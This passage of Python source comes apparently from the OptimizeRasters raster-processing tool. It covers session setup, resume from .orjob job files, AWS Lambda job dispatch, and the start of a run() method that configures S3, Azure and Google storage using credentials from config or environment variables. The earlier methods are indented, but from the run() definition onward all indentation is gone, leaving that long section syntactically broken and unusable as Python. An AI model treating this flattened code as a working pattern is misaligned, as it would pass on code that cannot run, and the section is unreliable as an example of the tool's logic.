    # skip reinitialization; point -input at the newly created .orjob file.
    self._args.input = jobFile
    self._args.op = savedOp
    return _rpt or None
def init(self):
    """Prepare the session: args, config, logging, Base, optional Report/TIL.

    Resets the module globals (_rpt, cfg, til), normalizes user args into an
    Args bag, loads config, builds self._base, and wires up resume (.orjob)
    support. Returns False on any failure.
    """
    global _rpt, \
        cfg, \
        til
    self.writeToConsole(self.__program_name__)
    self.writeToConsole(self.__program_desc__)
    _rpt = cfg = til = None
    if (not self._usr_args):
        return False
    os.path.sep = '/'  # NOTE(review): mutates a stdlib global for the whole process.
    if (isinstance(self._usr_args, argparse.Namespace)):
        self._args = self._usr_args
    else:
        # dict input (API callers): copy keys into an Args bag.
        self._args = Args()
        for i in self._usr_args:
            try:
                self._args.__setattr__(i, self._usr_args[i])
            except BaseException:
                pass
        if (self._args.__getattr__(CRESUME_ARG) is None):
            self._args.__setattr__(CRESUME_ARG, True)
    if (not self.__load_config__(self._args)):
        return False
    self._base = self.__setupLogSupport()  # initialize log support.
    if (self._base.getMessageHandler):
        self._base._m_log.isGPRun = self.postMessagesToArcGIS
    if (not CDisableVersionCheck):
        self.__setupVersionCheck()
    if (not self._base.init()):
        self._base.message(
            'Unable to initialize the (Base) module', self._base.const_critical_text)
        return False
    if (self._args.input and
            self._args.input.lower().endswith(Report.CJOB_EXT) and
            os.path.isfile(self._args.input)):
        # resume path: load state from the .orjob file.
        _rpt = Report(self._base)
        # not checked for return.
        if (not _rpt.init(self._args.input)):
            self._base.message('Unable to init (Report/job)',
                               self._base.const_critical_text)
            return False
        for arg in vars(self._args):
            if (arg == CRESUME_HDR_INPUT):
                continue
            # any other cmd-line args will be ignored/nullified.
            setattr(self._args, arg, None)
        if (not _rpt.read(self.__jobContentCallback)):
            self._base.message(
                'Unable to read the -input job file.', self._base.const_critical_text)
            return False
        if (CRESUME_HDR_OUTPUT in self._usr_args):
            # override the output path in the .orjob file if a custom 'output' path exists.
            # do only if called by user code. self._usr_args type is 'argparse' when called by cmd-line
            if (isinstance(self._usr_args, dict)):
                userOutput = self._base.convertToForwardSlash(
                    self._usr_args[CRESUME_HDR_OUTPUT])
                self._base.getUserConfiguration.setValue(
                    CCFG_PRIVATE_OUTPUT, userOutput)
                self._args.output = userOutput
        # ends
        self._base.getUserConfiguration.setValue(CPRT_HANDLER, _rpt)
    # verify user defined text for cloud output path
    usrPath = self._args.hashkey
    if (usrPath):
        usrPathPos = CHASH_DEF_INSERT_POS  # default insert pos
        _s = usrPath.split(CHASH_DEF_SPLIT_CHAR)
        if (len(_s) == 2):
            if (not _s[0]):
                _s[0] = CHASH_DEF_CHAR
        usrPath = _s[0]
        if (len(_s) > 1):
            try:
                usrPathPos = int(_s[1])
                if (int(_s[1]) < CHASH_DEF_INSERT_POS):
                    usrPathPos = CHASH_DEF_INSERT_POS
            except BaseException:
                pass
        self._base.getUserConfiguration.setValue(
            CUSR_TEXT_IN_PATH, '{}{}{}'.format(usrPath, CHASH_DEF_SPLIT_CHAR, usrPathPos))
    # ends
    # do we need to process (til) files?
    if ('til' in [x.lower() for x in self._base.getUserConfiguration.getValue(CCFG_RASTERS_NODE)]):
        til = TIL()
        if (self._base.getBooleanValue(self._base.getUserConfiguration.getValue(CDEFAULT_TIL_PROCESSING))):
            til.defaultTILProcessing = True
    # ends
    return True
def registerMessageCallback(self, fnptr):
    """Install *fnptr* as the message sink.

    NOTE(review): returns False for a falsy callback but None on success —
    callers should not rely on the success return value.
    """
    if (fnptr):
        self._msg_callback = fnptr
        return None
    return False
@property
def postMessagesToArcGIS(self):
    # True when messages should also be routed to the ArcGIS GP channel.
    return self._postMessagesToArcGIS

@postMessagesToArcGIS.setter
def postMessagesToArcGIS(self, value):
    # Coerce any input (bool/str like 'true'/'yes') via the shared helper.
    self._postMessagesToArcGIS = getBooleanValue(value)
def __jobContentCallback(self, line):
    """Report.read() line hook: lift '# key=value' header entries onto self._args."""
    if (cfg and
            cfg.getValue(CLOAD_RESTORE_POINT)):  # ignore if not called from main()
        return True
    firstField = line.strip().split(',')[0].strip().replace('\\', '/')
    if (firstField.startswith(Report.CHEADER_PREFIX)):
        tokens = firstField.replace(Report.CHEADER_PREFIX, '').split('=')
        if (len(tokens) > 1):
            key = tokens[0].strip()
            # rejoin: the value itself may contain '=' characters.
            value = '='.join(tokens[1:]).strip()
            if (key == CRESUME_HDR_INPUT):
                return True
            setattr(self._args, key, value)
    return True
def __initOperationCreateJob(self):
    """Create and read the fresh .orjob Report used by op=createJob."""
    global _rpt
    _rpt = Report(self._base)
    jobName = cfg.getValue(CPRJ_NAME, False)
    if (not jobName.lower().endswith(Report.CJOB_EXT)):
        jobName += Report.CJOB_EXT
    jobPath = os.path.join(os.path.dirname(os.path.abspath(__file__)), jobName)
    if (not _rpt.init(jobPath) or
            not _rpt.read()):  # not checked for return.
        self._base.message(
            'Unable to init/read (Report/job/op/createJob)', self._base.const_critical_text)
        return False
    return True
@property
def isOperationCreateJob(self):
    """True when -op=createJob applies (suppressed by resume=retryall)."""
    if (not self._args.op or
            self._args.op != COP_CREATEJOB):
        return False
    # note (op=={COP_CREATEJOB} is ignored if resume == {CRESUME_ARG_VAL_RETRYALL}
    if (_rpt and
            CRESUME_ARG in _rpt._header and
            _rpt._header[CRESUME_ARG].lower() == CRESUME_ARG_VAL_RETRYALL):
        return False
    return True
def _isLambdaJob(self):
    """Decide whether this job should be handed off to AWS Lambda."""
    if (CRUN_IN_AWSLAMBDA):
        # already executing inside Lambda; never re-submit.
        return False
    op = self._args.op
    if (not op or
            not op.startswith(COP_LAMBDA)):
        return False
    if (not self._base.getBooleanValue(self._args.clouddownload)):
        reporter = self._base.getUserConfiguration.getValue(
            CPRT_HANDLER)
        # local (non-http) input can't be processed remotely.
        if (reporter and
                not reporter._isInputHTTP):
            return False
    return self._base.getBooleanValue(self._args.cloudupload)
def _runLambdaJob(self, jobFile):
    """Submit *jobFile* to the AWS Lambda processing pipeline via SNS."""
    # process @ lambda
    self._base.message('Using AWS Lambda..')
    dispatcher = Lambda(self._base)
    if (not dispatcher.initSNS('aws_lambda')):
        self._base.message('Unable to initialize',
                           self._base.const_critical_text)
        return False
    if (not dispatcher.submitJob(jobFile)):
        self._base.message('Unable to submit job.',
                           self._base.const_critical_text)
        return False
    return True
# ends
def run(self):
global raster_buff, \
til, \
cfg, \
_rpt, \
g_rpt, \
g_is_generate_report, \
user_args_Callback, \
S3_storage, \
azure_storage, \
google_storage
S3_storage = None
azure_storage = None
google_storage = None
g_rpt = None
raster_buff = []
g_is_generate_report = False
CRESUME_CREATE_JOB_TEXT = '[Resume] Creating job ({})'
# is resume?
if (self._args.input and
self._args.input.lower().endswith(Report.CJOB_EXT) and
os.path.isfile(self._args.input)):
_rpt = Report(self._base)
# not checked for return.
if (not _rpt.init(self._args.input)):
self._base.message(
'Unable to init (Reporter/obj)', self._base.const_critical_text)
return(terminate(self._base, eFAIL))
if (not _rpt.read()):
self._base.message('Unable to read the -input report file ({})'.format(
self._args.input), self._base.const_critical_text)
return(terminate(self._base, eFAIL))
self._args.job = os.path.basename(self._args.input)
self._base.getUserConfiguration.setValue(CPRT_HANDLER, _rpt)
# ends
# Get the default (project name)
p = f = None
project_name = self._args.job
if (project_name):
(p, f) = os.path.split(project_name)
if (os.path.isdir(project_name)):
project_name = None
if (f):
project_name = f
if (not p):
p = __file__
if (project_name and
project_name.lower().endswith(Report.CJOB_EXT)):
project_name = project_name[:len(
project_name) - len(Report.CJOB_EXT)]
if (not project_name and
not f):
project_name = cfg.getValue(CPRJ_NAME, False)
if (not project_name and
not f): # is the project still null?
project_name = Report.getUniqueFileName() # 'OptimizeRasters'
if (self._base.getMessageHandler):
# update (log) file name prefix.
self._base.getMessageHandler.LogNamePrefix(project_name)
cfg.setValue(CPRJ_NAME, project_name)
_project_path = '{}{}'.format(os.path.join(os.path.dirname(self._args.input if self._args.input and self._args.input.lower(
).endswith(Report.CJOB_EXT) else p), project_name), Report.CJOB_EXT)
if (not cfg.getValue(CLOAD_RESTORE_POINT)):
if (os.path.exists(_project_path)):
# .orobs with -op={createJob} can't be run.
if (self.isOperationCreateJob):
self._base.message('{} Job ({}) already exists!'.format(
CRESUME_MSG_PREFIX, _project_path))
return True
# process @ lambda?
if (self._isLambdaJob()):
return(terminate(self._base, eOK if self._runLambdaJob(_project_path) else eFAIL))
# ends
self._args.op = None
self._args.input = _project_path
cfg.setValue(CLOAD_RESTORE_POINT, True)
self._base.message('{} Using job ({})'.format(
CRESUME_MSG_PREFIX, _project_path))
_status = self.run()
return
# ends
# set cloudupload value {
if (self._args.cloudupload is None):
self._args.cloudupload = cfg.getValue(CCLOUD_UPLOAD)
# }
# detect input cloud type
cloudDownloadType = self._args.clouddownloadtype
if (not cloudDownloadType):
cloudDownloadType = cfg.getValue(CIN_CLOUD_TYPE, True)
inAmazon = cloudDownloadType == CCLOUD_AMAZON or not cloudDownloadType
if (inAmazon):
cloudDownloadType = Store.TypeAmazon
cfg.setValue(CIN_CLOUD_TYPE, cloudDownloadType)
# ends
# are we doing input from S3|Azure?
isinput_s3 = self._base.getBooleanValue(self._args.s3input)
if (self._args.clouddownload):
isinput_s3 = self._base.getBooleanValue(self._args.clouddownload)
# ends
# let's create a restore point
if (not self._args.input or # assume it's a folder from s3/azure
(self._args.input and
not os.path.isfile(self._args.input))):
if (not self._args.op):
self._args.op = COP_RPT
# valid (op/utility) commands
_utility = {
COP_UPL: None,
COP_DNL: None,
COP_RPT: None,
COP_NOCONVERT: None,
COP_LAMBDA: None,
COP_COPYONLY: None,
COP_CREATEJOB: None
}
# ends
# op={COP_COPYONLY} check
if (self._args.op == COP_RPT):
opKey = cfg.getValue(COP)
if (opKey == COP_COPYONLY):
if (self._base.getBooleanValue(self._args.cloudupload) or
self._args.s3output):
# conditions will enable local->local copy if -cloudupload is (false)
self._args.op = COP_UPL
else:
# -tempoutput is disabled if -cloudupload=false and -op={COP_COPYONLY}
self._args.tempoutput = None
if (isinput_s3):
self._args.op = COP_NOCONVERT
# Delete temporary files in (local) transit for (op={COP_COPYONLY}) if the input source is from (cloud).
cfg.setValue(COUT_DELETE_AFTER_UPLOAD, True)
# However, If the input (source) path is from the local machine, the config value in (COUT_DELETE_AFTER_UPLOAD) is used.
# ends
if (self._args.op):
splt = self._args.op.split(':')
splt[0] = splt[0].lower()
self._args.op = ':'.join(splt)
# -op arg can have multiple init values separated by ':', e.g. -op lambda:function:xyz
if (splt[0] not in _utility):
self._base.message('Invalid utility operation mode ({})'.format(
self._args.op), self._base.const_critical_text)
return(terminate(self._base, eFAIL))
if(self._args.op == COP_RPT or
self._args.op == COP_UPL or
self._args.op == COP_NOCONVERT or
self._args.op == COP_COPYONLY or
self._args.op == COP_CREATEJOB or
self._args.op.startswith(COP_LAMBDA)):
if (self._args.op.startswith(COP_LAMBDA)):
# make these cmd-line args (optional) to type at the cmd-line for op={COP_LAMBDA}
isinput_s3 = self._args.clouddownload = self._args.cloudupload = True
cfg.setValue(Lambda.queue_length, self._args.queuelength)
g_rpt = Report(self._base)
if (not g_rpt.init(_project_path, self._args.input if self._args.input else cfg.getValue(CIN_S3_PARENTFOLDER if inAmazon else CIN_AZURE_PARENTFOLDER, False))):
self._base.message(
'Unable to init (Report)', self._base.const_critical_text)
return(terminate(self._base, eFAIL))
g_is_generate_report = True
if (self._args.op == COP_UPL):
self._args.cloudupload = 'true'
self._args.tempoutput = self._args.input if os.path.isdir(
self._args.input) else os.path.dirname(self._args.input)
if (cfg.getValue(CLOAD_RESTORE_POINT) and
_rpt):
if (CRESUME_HDR_INPUT not in _rpt._header):
return(terminate(self._base, eFAIL))
self._args.tempoutput = _rpt._header[CRESUME_HDR_INPUT]
# read-in <Mode>
cfg_mode = cfg.getValue('Mode')
# fix the slashes to force a convention
if (self._args.input):
self._args.input = self._base.convertToForwardSlash(self._args.input,
not (self._args.input.lower().endswith(Report.CJOB_EXT) or cfg_mode == BundleMaker.CMODE))
if (self._args.output):
self._args.output = self._base.convertToForwardSlash(
self._args.output)
if (self._args.cache):
self._args.cache = self._base.convertToForwardSlash(
self._args.cache)
# ends
# read in (interleave)
if (cfg.getValue(CCFG_INTERLEAVE) is None):
cfg.setValue(CCFG_INTERLEAVE, 'PIXEL')
# ends
# overwrite (Out_CloudUpload, IncludeSubdirectories) with cmd-line args if defined.
if (self._args.cloudupload or self._args.s3output):
cfg.setValue(CCLOUD_UPLOAD, self._base.getBooleanValue(self._args.cloudupload)
if self._args.cloudupload else self._base.getBooleanValue(self._args.s3output))
cfg.setValue(CCLOUD_UPLOAD_OLD_KEY, cfg.getValue(CCLOUD_UPLOAD))
if (self._args.clouduploadtype):
self._args.clouduploadtype = self._args.clouduploadtype.lower()
cfg.setValue(COUT_CLOUD_TYPE, self._args.clouduploadtype)
is_cloud_upload = self._base.getBooleanValue(cfg.getValue(CCLOUD_UPLOAD)) if cfg.getValue(
CCLOUD_UPLOAD) else self._base.getBooleanValue(cfg.getValue(CCLOUD_UPLOAD_OLD_KEY))
if (is_cloud_upload):
if (self._args.output and
self._args.output.startswith('/')): # remove any leading '/' for http -output
self._args.output = self._args.output[1:]
# for backward compatibility (-s3output)
if (not cfg.getValue(CCLOUD_UPLOAD)):
cfg.setValue(CCLOUD_UPLOAD, is_cloud_upload)
if (not cfg.getValue(COUT_CLOUD_TYPE)):
cfg.setValue(COUT_CLOUD_TYPE, CCLOUD_AMAZON)
# ends
if (self._args.subs is not None):
cfg.setValue('IncludeSubdirectories',
getBooleanValue(self._args.subs))
# ends
# do we have -tempinput path to copy rasters first before conversion.
is_input_temp = False
if (self._args.tempinput):
self._args.tempinput = self._base.convertToForwardSlash(
self._args.tempinput)
if (not os.path.isdir(self._args.tempinput)):
try:
makedirs(self._args.tempinput)
except Exception as exp:
self._base.message('Unable to create the -tempinput path (%s) [%s]' % (
self._args.tempinput, str(exp)), self._base.const_critical_text)
return(terminate(self._base, eFAIL))
is_input_temp = True # flag flows to deal with -tempinput
cfg.setValue(CISTEMPINPUT, is_input_temp)
cfg.setValue(CTEMPINPUT, self._args.tempinput)
# ends
# let's setup -tempoutput
is_output_temp = False
if (not self._args.tempoutput):
if (self._args.op and
self._args.op.startswith(COP_LAMBDA)):
# -tempoutput is not required when -cloudupload=true with -op=lambda.
self._args.tempoutput = '/tmp/'
# This is to suppress warnings or false alarms when reusing the .orjob file without the # -tempoutput key in header with the -clouduplaod=true.
if (self._args.tempoutput):
self._args.tempoutput = self._base.convertToForwardSlash(
self._args.tempoutput)
if (not os.path.isdir(self._args.tempoutput)):
# attempt to create the -tempoutput
try:
if (not self._args.op or
(self._args.op and
self._args.op != COP_UPL) and
self._args.op and
not self._args.op.startswith(COP_LAMBDA)):
makedirs(self._args.tempoutput)
except Exception as exp:
self._base.message('Unable to create the -tempoutput path (%s)\n[%s]' % (
self._args.tempoutput, str(exp)), self._base.const_critical_text)
return(terminate(self._base, eFAIL))
# ends
is_output_temp = True
cfg.setValue(CISTEMPOUTPUT, is_output_temp)
cfg.setValue(CTEMPOUTPUT, self._args.tempoutput)
# ends
# import boto modules only when required. This allows users to run the program for only local file operations.
if ((inAmazon and
isinput_s3) or
(getBooleanValue(cfg.getValue(CCLOUD_UPLOAD)) and
cfg.getValue(COUT_CLOUD_TYPE) == CCLOUD_AMAZON)):
cfg.setValue(CCFG_PRIVATE_INC_BOTO, True)
try:
global boto3
import boto3
except BaseException:
self._base.message('\n%s requires the (boto3) module to run its S3 specific operations. Please install (boto3) for python.' % (
self.__program_name__), self._base.const_critical_text)
return(terminate(self._base, eFAIL))
# ends
# take care of missing -input and -output if -clouddownload==True
# Note/Warning: S3/Azure inputs/outputs are case-sensitive hence wrong (case) could mean no files found on S3/Azure
if (isinput_s3):
_cloudInput = self._args.input
if (not _cloudInput):
_cloudInput = cfg.getValue(
CIN_S3_PARENTFOLDER if inAmazon else CIN_AZURE_PARENTFOLDER, False)
if (_cloudInput):
self._args.input = _cloudInput = _cloudInput.strip().replace('\\', '/')
cfg.setValue(CIN_S3_PARENTFOLDER, _cloudInput)
if (is_cloud_upload):
if (not is_output_temp):
if ((self._args.op and self._args.op != COP_UPL) or
not self._args.op and
(_rpt and
_rpt.operation != COP_UPL)):
self._base.message(
'-tempoutput must be specified if -cloudupload=true', self._base.const_critical_text)
return(terminate(self._base, eFAIL))
_access = cfg.getValue(COUT_AZURE_ACCESS)
if (_access):
if (_access not in ('private', 'blob', 'container')):
self._base.message('Invalid value for ({})'.format(
COUT_AZURE_ACCESS), self._base.const_critical_text)
return(terminate(self._base, eFAIL))
# private is not recognized by Azure, used internally only for clarity
if (_access == 'private'):
# None == private container
cfg.setValue(COUT_AZURE_ACCESS, None)
if (self._args.output is None):
_cloud_upload_type = cfg.getValue(COUT_CLOUD_TYPE, True)
if (_cloud_upload_type == CCLOUD_AMAZON):
self._args.output = cfg.getValue(
COUT_S3_PARENTFOLDER, False)
elif (_cloud_upload_type == CCLOUD_AZURE):
self._args.output = cfg.getValue(
COUT_AZURE_PARENTFOLDER, False)
else:
self._base.message('Invalid value for ({})'.format(
COUT_CLOUD_TYPE), self._base.const_critical_text)
return(terminate(self._base, eFAIL))
if (self._args.output):
self._args.output = self._args.output.strip().replace('\\', '/')
cfg.setValue(COUT_S3_PARENTFOLDER, self._args.output)
# ends
if (not self._args.output or
not self._args.input):
if ((not self._args.op and
not self._args.input) or
(self._args.op and
not self._args.input)):
self._base.message(
'-input/-output is not specified!', self._base.const_critical_text)
return(terminate(self._base, eFAIL))
# set output in cfg.
dst_ = self._base.convertToForwardSlash(self._args.output)
cfg.setValue(CCFG_PRIVATE_OUTPUT, dst_ if dst_ else '')
# ends
# is -rasterproxypath/-clonepath defined at the cmd-line?
if (self._args.rasterproxypath):
# -rasterproxypath takes precedence. -clonepath is now deprecated.
self._args.clonepath = self._args.rasterproxypath
if (self._args.clonepath or
cfg_mode == 'rasterproxy'):
rpPath = self._args.clonepath if self._args.clonepath else self._args.output
if (rpPath[-4:].lower().endswith('.csv')):
cfg.setValue('rpformat', 'csv')
cfg.setValue(
'rpfname', self._base.convertToForwardSlash(rpPath, False))
if (self._args.clonepath):
self._args.clonepath = os.path.dirname(rpPath)
else: # if createrasterproxy template is used, -output is the -rasterproxypath
self._args.output = os.path.dirname(rpPath)
if (self._args.clonepath):
self._args.clonepath = self._base.convertToForwardSlash(
self._args.clonepath)
cfg.setValue(CCLONE_PATH, self._args.clonepath)
# ends
# cache path
if (self._args.cache):
cfg.setValue(CCACHE_PATH, self._args.cache)
# ends
# read in build pyramids value
do_pyramids = 'true'
if (not self._args.pyramids):
self._args.pyramids = cfg.getValue('BuildPyramids')
if (self._args.pyramids):
do_pyramids = self._args.pyramids = str(
self._args.pyramids).lower()
# ends
# set jpeg_quality from cmd to override cfg value. Must be set before compression->init()
if (self._args.quality):
cfg.setValue('Quality', self._args.quality)
if (self._args.prec):
cfg.setValue('LERCPrecision', self._args.prec)
if (self._args.pyramids):
if (self._args.pyramids == CCMD_PYRAMIDS_ONLY):
# -input, -output path check isn't done if -input points to a job (.orjob) file
if (not cfg.getValue(CLOAD_RESTORE_POINT)):
if (self._args.input != self._args.output):
# in case of input s3, output is used as a temp folder locally.
if (isinput_s3):
if (getBooleanValue(cfg.getValue(CCLOUD_UPLOAD))):
if (cfg.getValue(COUT_S3_PARENTFOLDER, False) != cfg.getValue(CIN_S3_PARENTFOLDER, False)):
self._base.message('<%s> and <%s> must be the same if the -pyramids=only' % (
CIN_S3_PARENTFOLDER, COUT_S3_PARENTFOLDER), const_critical_text)
return(terminate(self._base, eFAIL))
else:
self._base.message(
'-input and -output paths must be the same if the -pyramids=only', const_critical_text)
return(terminate(self._base, eFAIL))
if (not getBooleanValue(do_pyramids) and
do_pyramids != CCMD_PYRAMIDS_ONLY and
do_pyramids != CCMD_PYRAMIDS_EXTERNAL and
do_pyramids != CCMD_PYRAMIDS_SOURCE):
do_pyramids = 'false'
cfg.setValue('Pyramids', do_pyramids)
cfg.setValue('isuniformscale', True if do_pyramids == CCMD_PYRAMIDS_ONLY else getBooleanValue(
do_pyramids) if do_pyramids != CCMD_PYRAMIDS_SOURCE else CCMD_PYRAMIDS_SOURCE)
# ends
# read in the gdal_path from config.
# note: validity is checked within (compression-mod)
gdal_path = cfg.getValue(CCFG_GDAL_PATH, False)
# ends
comp = Compression(gdal_path, base=self._base)
# warning/error messages get printed within .init()
ret = comp.init(0)
if (not ret):
self._base.message(
'Unable to initialize/compression module', self._base.const_critical_text)
return(terminate(self._base, eFAIL))
# s3 upload settings.
out_s3_profile_name = self._args.outputprofile
if (not out_s3_profile_name):
out_s3_profile_name = cfg.getValue('Out_S3_AWS_ProfileName', False)
if (out_s3_profile_name):
cfg.setValue('Out_S3_AWS_ProfileName', out_s3_profile_name)
s3_output = cfg.getValue(COUT_S3_PARENTFOLDER, False)
inputClientIdEnvToRead = {
Store.TypeAmazon: 'AWS_ACCESS_KEY_ID',
Store.TypeAzure: 'AZURE_STORAGE_ACCOUNT',
Store.TypeGoogle: None
}
inputClientSecretEnvToRead = {
Store.TypeAmazon: 'AWS_SECRET_ACCESS_KEY',
Store.TypeAzure: 'AZURE_STORAGE_ACCESS_KEY',
Store.TypeGoogle: None
}
outputClientIdEnvToRead = {
Store.TypeAmazon: 'OR_OUT_AWS_ACCESS_KEY_ID',
Store.TypeAzure: 'OR_OUT_AZURE_STORAGE_ACCOUNT',
Store.TypeGoogle: None
}
outputClientSecretEnvToRead = {
Store.TypeAmazon: 'OR_OUT_AWS_SECRET_ACCESS_KEY',
Store.TypeAzure: 'OR_OUT_AZURE_STORAGE_ACCESS_KEY',
Store.TypeGoogle: None
}
s3_id = cfg.getValue('Out_S3_ID', False)
s3_secret = cfg.getValue('Out_S3_Secret', False)
cloudUploadType = cfg.getValue(COUT_CLOUD_TYPE, True)
if (not s3_id):
s3_id = os.environ[outputClientIdEnvToRead[cloudUploadType]
] if outputClientIdEnvToRead[cloudUploadType] in os.environ else None
if (not s3_secret):
s3_secret = os.environ[outputClientSecretEnvToRead[cloudUploadType]
] if outputClientSecretEnvToRead[cloudUploadType] in os.environ else None
err_init_msg = 'Unable to initialize the ({}) upload module! Check module setup/credentials. Quitting..'
if (self._base.getBooleanValue(cfg.getValue(CCLOUD_UPLOAD))):
if (cloudUploadType == CCLOUD_AMAZON):
if ((s3_output is None and self._args.output is None)):
self._base.message('Empty/Invalid values detected for keys in the ({}) beginning with (Out_S3|Out_S3_ID|Out_S3_Secret|Out_S3_AWS_ProfileName) or values for command-line args (-outputprofile)'.format(
self._args.config), self._base.const_critical_text)
return(terminate(self._base, eFAIL))
# instance of upload storage.
S3_storage = S3Storage(self._base)
if (self._args.output):
s3_output = self._args.output
cfg.setValue(COUT_S3_PARENTFOLDER, s3_output)
# do we overwrite the output_bucekt_name with cmd-line?
if (self._args.outputbucket):
cfg.setValue('Out_S3_Bucket', self._args.outputbucket)
# end
ret = S3_storage.init(
s3_output, s3_id, s3_secret, CS3STORAGE_OUT)
if (not ret):
self._base.message(err_init_msg.format(
'S3'), const_critical_text)
return(terminate(self._base, eFAIL))
S3_storage.inputPath = self._args.output
domain = S3_storage.con.meta.client.generate_presigned_url(
'get_object', Params={'Bucket': S3_storage.m_bucketname, 'Key': ' '}).split('%20?')[0]
cfg.setValue(COUT_VSICURL_PREFIX, '/vsicurl/{}{}'.format(domain.replace('https', 'http'),
cfg.getValue(COUT_S3_PARENTFOLDER, False)) if not S3_storage._isBucketPublic else
'/vsicurl/http://{}.{}/{}'.format(S3_storage.m_bucketname, CINOUT_S3_DEFAULT_DOMAIN, cfg.getValue(COUT_S3_PARENTFOLDER, False)))
# ends
elif (cfg.getValue(COUT_CLOUD_TYPE, True) == CCLOUD_AZURE):
_account_name = cfg.getValue(COUT_AZURE_ACCOUNTNAME, False)
_account_key = cfg.getValue(COUT_AZURE_ACCOUNTKEY, False)
if (not _account_name):
_account_name = s3_id
if (not _account_key):
_account_key = s3_secret
_container = cfg.getValue(COUT_AZURE_CONTAINER)
_out_profile = cfg.getValue(COUT_AZURE_PROFILENAME, False)
if (self._args.outputbucket):
_container = self._args.outputbucket
outBucket = self._args.outputbucket.lower()
cfg.setValue(COUT_AZURE_CONTAINER,
outBucket) # lowercased
# UpdateMRF/update uses 'Out_S3_Bucket'/Generic key name to read in the output bucket name.
cfg.setValue('Out_S3_Bucket', outBucket)
if (self._args.outputprofile):
_out_profile = self._args.outputprofile
cfg.setValue(COUT_AZURE_PROFILENAME, _out_profile)
bOutToken = False
if (_account_name and
_account_name.lower().startswith('https:')):
bOutToken = True
if (((not _account_name or
not _account_key) and
not _out_profile) or
not _container):
if (not bOutToken):
self._base.message('Empty/Invalid values detected for keys ({}/{}/{}/{})'.format(COUT_AZURE_ACCOUNTNAME,
COUT_AZURE_ACCOUNTKEY, COUT_AZURE_CONTAINER, COUT_AZURE_PROFILENAME), self._base.const_critical_text)
return(terminate(self._base, eFAIL))
azure_storage = Azure(
_account_name, _account_key, _out_profile, self._base)
if (not azure_storage.init(CS3STORAGE_OUT)):
self._base.message(err_init_msg.format(
CCLOUD_AZURE.capitalize()), self._base.const_critical_text)
return(terminate(self._base, eFAIL))
cfg.setValue(COUT_VSICURL_PREFIX, '/vsicurl/{}{}'.format('{}/{}/'.format(azure_storage.getAccountName, _container),
self._args.output if self._args.output else cfg.getValue(COUT_S3_PARENTFOLDER, False)))
elif (cfg.getValue(COUT_CLOUD_TYPE, True) == Store.TypeGoogle):
_bucket = cfg.getValue(COUT_GOOGLE_BUCKET) # bucket name
_out_profile = cfg.getValue(COUT_GOOGLE_PROFILENAME, False)
if (self._args.outputbucket):
_bucket = self._args.outputbucket
# lowercased
cfg.setValue(COUT_GOOGLE_BUCKET,
self._args.outputbucket.lower())
if (self._args.outputprofile):
_out_profile = self._args.outputprofile
cfg.setValue(COUT_GOOGLE_PROFILENAME, _out_profile)
if (not _out_profile or
not _bucket):
self._base.message('Empty/Invalid values detected for keys ({}/{})'.format(
COUT_GOOGLE_BUCKET, COUT_GOOGLE_PROFILENAME), self._base.const_critical_text)
return(terminate(self._base, eFAIL))
google_storage = Google(None, '', '', _out_profile, self._base)
if (not google_storage.init(_bucket)):
self._base.message(err_init_msg.format(
Store.TypeGoogle.capitalize()), self._base.const_critical_text)
return(terminate(self._base, eFAIL))
cfg.setValue(COUT_VSICURL_PREFIX, '/vsicurl/{}/{}'.format('{}{}'.format(Google.DafaultStorageDomain,
_bucket), self._args.output if self._args.output else cfg.getValue(COUT_GOOGLE_PARENTFOLDER, False)))
else:
self._base.message('Invalid value for ({})'.format(
COUT_CLOUD_TYPE), self._base.const_critical_text)
return(terminate(self._base, eFAIL))
isDeleteAfterUpload = cfg.getValue(COUT_DELETE_AFTER_UPLOAD)
if (isDeleteAfterUpload is None):
isDeleteAfterUpload = cfg.getValue(
COUT_DELETE_AFTER_UPLOAD_OBSOLETE)
isDeleteAfterUpload = self._base.getBooleanValue(isDeleteAfterUpload)
user_args_Callback = {
USR_ARG_UPLOAD: self._base.getBooleanValue(cfg.getValue(CCLOUD_UPLOAD)),
USR_ARG_DEL: isDeleteAfterUpload
}
# ends
cpy = Copy(self._base)
list = {
'copy': {'*'},
'exclude': {}
}
for i in cfg.getValue(CCFG_RASTERS_NODE) + cfg.getValue(CCFG_EXCLUDE_NODE):
list['exclude'][i] = ''
is_caching = False
if (cfg_mode == 'clonemrf' or
cfg_mode == 'splitmrf' or
cfg_mode == 'cachingmrf' or
cfg_mode == 'rasterproxy'):
is_caching = True
if (is_caching):
cfg.setValue(CISTEMPINPUT, False)
cfg.setValue('Pyramids', False)
callbacks = {
# 'copy' : copy_callback,
'exclude': exclude_callback
}
callbacks_for_meta = {
'exclude': exclude_callback_for_meta
}
CONST_CPY_ERR_0 = 'Unable to initialize (Copy) module!'
CONST_CPY_ERR_1 = 'Unable to process input data/(Copy) module!'
# keep original-source-ext
cfg_keep_original_ext = self._base.getBooleanValue(
cfg.getValue('KeepExtension'))
cfg_threads = cfg.getValue('Threads')
msg_threads = 'Thread-count invalid/undefined, resetting to default'
try:
cfg_threads = int(cfg_threads) # (None) value is expected
except BaseException:
cfg_threads = -1
if (cfg_threads <= 0 or
(cfg_threads > CCFG_THREADS and
not is_caching)):
cfg_threads = CCFG_THREADS
self._base.message('%s(%s)' % (
msg_threads, CCFG_THREADS), self._base.const_warning_text)
# ends
# let's deal with copying when -input is on s3
storeUseToken = cfg.getValue('UseToken')
isUseToken = self._args.usetoken if self._args.usetoken else storeUseToken
if (not isUseToken):
isUseToken = self._base.getUserConfiguration.getValue(UseToken)
cfg.setValue(UseToken, self._base.getBooleanValue(isUseToken))
if (isinput_s3):
cfg.setValue('iss3', True)
in_s3_parent = cfg.getValue(CIN_S3_PARENTFOLDER, False)
in_s3_profile_name = self._args.inputprofile
if (not in_s3_profile_name):
inputProfileKeyToRead = {
Store.TypeAmazon: 'In_S3_AWS_ProfileName',
Store.TypeAzure: 'In_Azure_ProfileName',
Store.TypeGoogle: 'In_Google_ProfileName'
}
in_s3_profile_name = cfg.getValue(
inputProfileKeyToRead[cloudDownloadType], False)
if (in_s3_profile_name):
cfg.setValue('In_S3_AWS_ProfileName', in_s3_profile_name)
inputClientIdKeyToRead = {
Store.TypeAmazon: 'In_S3_ID',
Store.TypeAzure: 'In_Azure_AccountName',
Store.TypeGoogle: None
}
inputClientSecretKeyToRead = {
Store.TypeAmazon: 'In_S3_Secret',
Store.TypeAzure: 'In_Azure_AccountKey',
Store.TypeGoogle: None
}
in_s3_id = cfg.getValue(
inputClientIdKeyToRead[cloudDownloadType], False)
in_s3_secret = cfg.getValue(
inputClientSecretKeyToRead[cloudDownloadType], False)
if (not in_s3_id):
